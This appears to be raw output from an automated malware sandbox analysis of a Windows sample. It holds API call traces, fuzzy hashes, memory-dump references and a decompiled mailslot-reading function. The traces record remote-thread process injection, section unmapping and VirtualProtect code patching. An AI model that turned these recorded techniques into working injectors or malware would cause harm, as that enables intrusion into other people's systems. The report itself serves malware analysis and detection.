0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 001D7A61, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 124 Total matches: 6memory
Similarity
  • Total matches: 6
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-3916222277
  • Opcode ID: 5d54db91bb8872728a7f338422e6e2575366b81ba5fa63999995d3bab01c6a8b
  • Instruction ID: 7046ed55330d99fded0f4fc859fbdadb162bd0e82c17059ba0f8a3e3f23ff779
  • Opcode Fuzzy Hash: 6C01CE6A618AC256DC3774402413ED2E544DF837C2D4C36339BAB2363F1B813246B70D
  • Instruction Fuzzy Hash: 7046ed55330d99fded0f4fc859fbdadb162bd0e82c17059ba0f8a3e3f23ff779
APIs
    • Part of subcall function 001DA12F: lstrcmp.KERNEL32(?,00000000), ref: 001DA1E4
    • Part of subcall function 001DA12F: lstrlen.KERNEL32(?,00000001,00000000,?), ref: 001DA1EF
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
  • GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001D799E: lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001D799E: lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
    • Part of subcall function 001D799E: StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
    • Part of subcall function 001D799E: GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
  • VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
  • VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
  • VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D8479: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,001EB220), ref: 001D8490
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7CFA, Relevance: 13.6, APIs: 9, Instructions: 114 Total matches: 65memorystring
Similarity
  • Total matches: 65
  • API ID: VirtualProtect$GetLastErrorlstrcpylstrlen
  • String ID:
  • API String ID: 208590223-0
  • Opcode ID: c5fcf50122d35def001d29232e694ba35af908110bc64aa401ca479f181033be
  • Instruction ID: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
  • Opcode Fuzzy Hash: 18F04E475442424BEDC63DC4165325AED98EFD3D9481C6373FE161499642902225FF2D
  • Instruction Fuzzy Hash: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
APIs
  • lstrlen.KERNEL32(74C08500,?,00000000,001CD8AF,?,001EB068), ref: 001D7D47
  • VirtualProtect.KERNELBASE(00000000,00000000,00000040,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D59
  • lstrcpy.KERNEL32(00000000,74C08500), ref: 001D7D68
  • VirtualProtect.KERNELBASE(00000000,00000000,?,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D79
  • VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DA7
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DC2
  • VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DFE
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E18
  • GetLastError.KERNEL32(?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E1F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 01B31673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B322D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B32427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: 74eade3f190c4a0697bbd14a78cdb86cd2f7d3a49057973da75d73adb6c5ad00
  • Instruction ID: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
  • Opcode Fuzzy Hash: 88E05C50053DC7C59834A89704E0BB3F141FE51306AAC6B28363824614AF583E275B44
  • Instruction Fuzzy Hash: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
APIs
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
  • OpenProcess.KERNEL32(001F0FFF,00000000,01B315DA,01B315DA,C000009A,01B37494,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B32452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324AC
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324CE
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
  • CloseHandle.KERNEL32(01B315DA), ref: 01B324C6
  • CloseHandle.KERNEL32(?), ref: 01B324E0
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324E8
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001CD171, Relevance: 9.1, APIs: 6, Instructions: 67 Total matches: 31thread
Similarity
  • Total matches: 31
  • API ID: CreateEventGetLastErrorInterlockedDecrementOpenEventRtlExitUserThreadWaitForMultipleObjects
  • String ID:
  • API String ID: 420885392-0
  • Opcode ID: d33af0a5ccd8da24651d90541fd71a469b169468326c88d3ba2cd7f680d024ee
  • Instruction ID: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
  • Opcode Fuzzy Hash: 38E02B3406094157223F70A4A211B7F4ED8F8872C268D638BFC283D2AD5A0791E62557
  • Instruction Fuzzy Hash: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
APIs
  • OpenEventA.KERNEL32(00100000,00000000), ref: 001CD1A0
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001CD1BB
  • GetLastError.KERNEL32 ref: 001CD1C8
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CD1EB
  • InterlockedDecrement.KERNEL32(001EAF4C), ref: 001CD217
    • Part of subcall function 001C13D6: SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001C13D6: CloseHandle.KERNEL32(001EB094), ref: 001C13F5
    • Part of subcall function 001C13D6: HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
  • RtlExitUserThread.NTDLL(00000000), ref: 001CD22E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CD890, Relevance: 7.6, APIs: 5, Instructions: 123 Total matches: 3memorysynchronization
Similarity
  • Total matches: 3
  • API ID: HeapFreeLocalFreeReleaseMutexRtlRemoveVectoredExceptionHandlerSleepEx
  • String ID:
  • API String ID: 567273588-0
  • Opcode ID: ab5aec27645f8af340170e833bba8119d55850c0883528ab0e192ea95400f4cf
  • Instruction ID: 0f4f74b15e85b15de101cfb7422835ebe1d854837d6f51dffef29935a7c65f93
  • Opcode Fuzzy Hash: 1A0149B715154283E0BF24D4CA047BE9A4DDB906DAACC6A47FE15705885A0FD6C03FC1
  • Instruction Fuzzy Hash: 0f4f74b15e85b15de101cfb7422835ebe1d854837d6f51dffef29935a7c65f93
APIs
  • SleepEx.KERNELBASE(00000064,00000001,?,001EB068,?,00000000,001C13EB), ref: 001CD8B9
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
  • HeapFree.KERNEL32(00000000,001EB160), ref: 001CD964
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CD99D
  • ReleaseMutex.KERNEL32(001EB020,?,001EB068,?,00000000,001C13EB), ref: 001CD9AD
  • LocalFree.KERNEL32(?,001EB068,?,00000000,001C13EB), ref: 001CDA08
    • Part of subcall function 001CE2B9: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE2C2
    • Part of subcall function 001CE2B9: Sleep.KERNEL32(0000000A,?,001EB068,?,00000000,001C13EB), ref: 001CE2CC
    • Part of subcall function 001CE2B9: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE2F7
    • Part of subcall function 001DAB1D: RtlLeaveCriticalSection.NTDLL(001EAFF4), ref: 001DAB5B
    • Part of subcall function 001DAB1D: HeapFree.KERNEL32(00000000,001EAFF4), ref: 001DAB6A
    • Part of subcall function 001D80C6: GetVersion.KERNEL32(001EB068,00000000,001E51C0,?,001CD8AA,?,001EB068,?,00000000,001C13EB), ref: 001D80EA
    • Part of subcall function 001D80C6: GetModuleHandleA.KERNEL32(001EC8C6,001ED08E,?,001CD8AA,?,001EB068,?,00000000,001C13EB), ref: 001D80FE
    • Part of subcall function 001D80C6: GetProcAddress.KERNEL32(00000000,?,001CD8AA,?,001EB068,?,00000000,001C13EB), ref: 001D8105
    • Part of subcall function 001D7EEA: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7EF4
    • Part of subcall function 001D7EEA: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7F30
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D77D8, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 97memory
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D8325, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3D4D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 38registry
Similarity
  • Total matches: 38
  • API ID: RegCloseKeyRegQueryValueExwsprintf
  • String ID: Client
  • API String ID: 1809512201-3236430179
  • Opcode ID: 9042b19d19dd4b3d942996e0d3ea8ecf2d3d2b777e835d7718659b5b290a5e22
  • Instruction ID: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
  • Opcode Fuzzy Hash: 8CF04634A804C58A8693A885092A7FC4571B352AEECCCBF20F15852181FFC977D73B11
  • Instruction Fuzzy Hash: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(001CD70D,Client,00000000,?,001EA06C,?,00000001,001CD70D,00000000,00000000,00000001,?,?,00000000,001CD70D), ref: 001C3D98
